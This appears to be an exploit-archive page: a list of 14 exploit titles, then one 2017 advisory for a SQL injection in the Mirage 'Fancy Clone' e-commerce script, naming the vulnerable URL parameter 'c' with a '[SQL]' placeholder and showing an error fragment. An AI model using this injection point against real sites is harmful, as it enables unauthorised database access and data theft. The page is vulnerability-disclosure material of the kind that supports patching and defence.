
14 new exploits MobaXterm Personal Edition 9.4 - Directory Traversal Windows x86 - Hide Console Window Shellcode (182 bytes) e107 <= 2.1.4 - 'keyword' Blind SQL Injection Domain Marketplace Script - SQL Injection Global In - SQL Injection Global In - Arbitrary File Upload Vanelo - SQL Injection Mirage - SQL Injection Pet Listing Script 3.0 - SQL Injection Property Listing Script 3.1 - SQL Injection Travel Tours Script 2.0 - SQL Injection Yacht Listing Script 2.0 - SQL Injection Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection PHP Forum Script 3.0 - SQL Injection
19 lines
No EOL
568 B
Text
Executable file
19 lines
No EOL
568 B
Text
Executable file
# # # # #
|
||
# Exploit Title: Mirage – Fancy Clone - SQL Injection
|
||
# Google Dork: N/A
|
||
# Date: 11.03.2017
|
||
# Vendor Homepage: https://www.zoplay.com/
|
||
# Software: https://www.zoplay.com/web/multi-vendor-clone-website/
|
||
# Demo: http://fancyclone.zoplay.com/
|
||
# Version: N/A
|
||
# Tested on: Win7 x64, Kali Linux x64
|
||
# # # # #
|
||
# Exploit Author: Ihsan Sencan
|
||
# Author Web: http://ihsan.net
|
||
# Author Mail: ihsan[@]ihsan[.]net
|
||
# # # # #
|
||
# SQL Injection/Exploit :
|
||
# http://localhost/[PATH]/shopby/IhsanSencan?c=[SQL]
|
||
# Duplicate entry 'fancyclone
|
||
# Etc..
|
||
# # # # # |